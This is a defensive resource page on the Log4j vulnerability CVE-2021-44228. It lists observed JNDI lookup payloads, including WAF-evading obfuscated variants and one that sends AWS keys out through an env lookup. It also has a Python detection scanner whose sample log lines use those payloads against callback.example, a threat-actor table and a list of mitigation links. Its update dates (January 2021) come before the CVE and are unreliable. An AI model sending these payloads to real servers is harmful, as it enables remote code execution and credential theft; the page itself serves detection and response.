Log4j Threat Hunting and Incident Response Resources

Latest Updates

  • Included New Log4J Section - 1/13/2021
  • Added Threat Actors and new link to payloads - 1/20/2021

Log4j Vulnerability CVE-2021-44228

A flaw in Log4j, a widely used Java library for logging error messages in applications, is currently the most high-profile security vulnerability on the internet and carries a CVSS severity score of 10 out of 10. Log4j is used in enterprise software, including custom applications developed in-house by businesses, and forms part of many cloud computing services. Because Log4j is so widely deployed, the vulnerability may affect a very wide range of software and services from many major vendors.

Attack Payload Exploiting JNDI Lookup

The attack payload exploiting this vulnerability follows the pattern ${jndi:://}.

Several protocol variants are used in the JNDI lookup. LDAP (Lightweight Directory Access Protocol) is the most common, but attackers also use other protocols and obfuscate the lookup string to evade WAF (Web Application Firewall) detection.

The list below shows the most common attack payloads observed:

  • ${jndi:ldap://
  • ${jndi:dns://
  • ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://
  • ${jndi:${lower:l}${lower:d}a${lower:p}://
  • ${jndi:ldaps://
  • ${jndi:iiop://
  • ${jndi:rmi://
  • ${jndi:${lower:d}n${lower:s}://

Payload that attempts to steal AWS access keys from environment variables:

  • ${jndi:ldap://${env:AWS_ACCESS_KEY}.(snipped)}
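As an added detection example (not from the original page), the scanner below normalizes the ${lower:...} obfuscation shown above before looking for a JNDI lookup, so the evasion variants collapse to the same ${jndi:scheme:// form; it also handles ${upper:...} and the ${x:-d} default-value form (assumed additional obfuscation variants) and flags lookups that reference ${env:...}. The log lines, host name callback.example and helper names are constructed for this example.

```python
import re

# Innermost ${...} lookup: its body contains no further braces.
_INNER = re.compile(r"\$\{([^{}]*)\}")
# A JNDI lookup after normalization; the scheme may be empty (${jndi:://...}).
# Schemes seen on this page: ldap, ldaps, rmi, dns, iiop.
_JNDI = re.compile(r"\$\{jndi:([a-z]*):?//", re.IGNORECASE)

def _resolve(m):
    """Evaluate one obfuscation lookup; real lookups (jndi, env) are kept verbatim."""
    body = m.group(1)
    kind, sep, arg = body.partition(":")
    kind = kind.lower()
    if kind == "lower" and sep:            # ${lower:L} -> l
        return arg.lower()
    if kind == "upper" and sep:            # ${upper:l} -> L
        return arg.upper()
    if ":-" in body and kind not in ("jndi", "env"):
        return body.split(":-", 1)[1]      # default-value form, e.g. ${::-j} -> j (assumed variant)
    return m.group(0)

def normalize(text):
    """Collapse innermost lookups repeatedly until the string stops changing."""
    prev = None
    while prev != text:
        prev, text = text, _INNER.sub(_resolve, text)
    return text

def scan_lines(lines):
    """Return (line number, scheme, references ${env:}, normalized lookup) per JNDI hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        for m in _JNDI.finditer(norm):
            scheme = m.group(1).lower() or "unspecified"
            hits.append((n, scheme, "${env:" in norm, norm[m.start():m.start() + 48]))
    return hits

# Constructed sample lines (not real traffic); the User-Agent field carries the payload.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${jndi:ldap://callback.example/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${jndi:${lower:l}${lower:d}a${lower:p}://callback.example/a}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${${::-j}ndi:${lower:d}n${lower:s}://${env:AWS_ACCESS_KEY}.callback.example}"',
]

if __name__ == "__main__":
    for n, scheme, env_ref, lookup in scan_lines(SAMPLE_LOG):
        print(f"line {n}: jndi scheme={scheme} env_lookup={env_ref} -> {lookup}")
```

Run it over a web server access log (one line per list element) and triage the lines it returns; a hit with env_lookup=True matches the credential-theft payload above.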

Threat Groups

Grouping | Actor | Mentioned Alias | Other Alias | EternalLiberty Threat Report | Note
--- | --- | --- | --- | --- | ---
State actor | China | HAFNIUM | N/A | MSTIC (2) | HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting. In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems.
State actor | Iran | PHOSPHORUS | APT35, TEMP.Beanie, TA 453, NewsBeef, CharmingKitten, G0003, CobaltIllusion, TG-2889, Timberworm, C-Major, Group 41, Tarh Andishan, Magic Hound, Newscaster | MSTIC (2) | Iranian actor that has been deploying ransomware, and has acquired and modified the Log4j exploit.
Organized Cybercrime | Russia | Wizard Spider | Trickbot Gang, FIN12, GOLD BLACKBURN, Grim Spider | AdvIntel | Wizard Spider is the developer of the Conti Ransomware-as-a-Service (RaaS) operation, which has a high number of affiliates; a Conti affiliate has leveraged Log4Shell in Log4j2 in the wild.
Organized Cybercrime | Russia | EvilCorp | Indrik Spider, GOLD DRAKE | Cryptolaemus | EvilCorp are the developers of the Dridex Trojan, which began life as banking malware but has since shifted to support the delivery of ransomware, including BitPaymer, DoppelPaymer, Grief, and WastedLocker, among others. Dridex is now being dropped following the exploitation of vulnerable Log4j instances.
State actor | China | Aquatic Panda | N/A | CrowdStrike | AQUATIC PANDA is a China-based targeted intrusion adversary with a dual mission of intelligence collection and industrial espionage. It has likely operated since at least May 2020. AQUATIC PANDA operations have primarily focused on entities in the telecommunications, technology and government sectors. AQUATIC PANDA relies heavily on Cobalt Strike, and its toolset includes the unique Cobalt Strike downloader tracked as FishMaster. AQUATIC PANDA has also been observed delivering njRAT payloads to targets.
To be determined | China | DEV-0401 | N/A | MSTIC (4) | Attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon. An investigation shows that successful intrusions in these campaigns led to the deployment of the NightSky ransomware. These attacks are performed by a China-based ransomware operator that MSTIC is tracking as DEV-0401. DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo, and Rook, and has similarly exploited internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).
Organized Cybercrime | Russia | Mummy Spider | TA542, MealyBug, GoldCrestwood | SentinelOne | Naturally, the Emotet crew has been taking advantage of Log4j as well. For example, vulnerable servers were quickly compromised and used for staging and payload hosting within the greater Emotet network.

List of resources for finding and mitigating the Log4j vulnerability and exploit

List of Known Vulnerable Hashes

Links to other resources and open source intel on the Log4j vulnerability:

  • CISA Guidance on Log4j
  • CISA Guidance on Mitigation Steps
  • FTC warning to businesses on Log4j
  • Vulnerable Vendors list for Log4j
  • VMware Horizon Log4j Hacker Remote Code Execution
  • CISA Vulnerable Vendors list for Log4j
  • mubix (Rob Fuller) · GitHub
  • Callback Domains log4j · GitHub
  • Tanium Software to find Log4j
  • Yara Rules to Find Log4j
  • Logpresso Scanner to find and mitigate Log4j
  • JPCERT
  • Apache Vulnerabilities
  • Other Payload Samples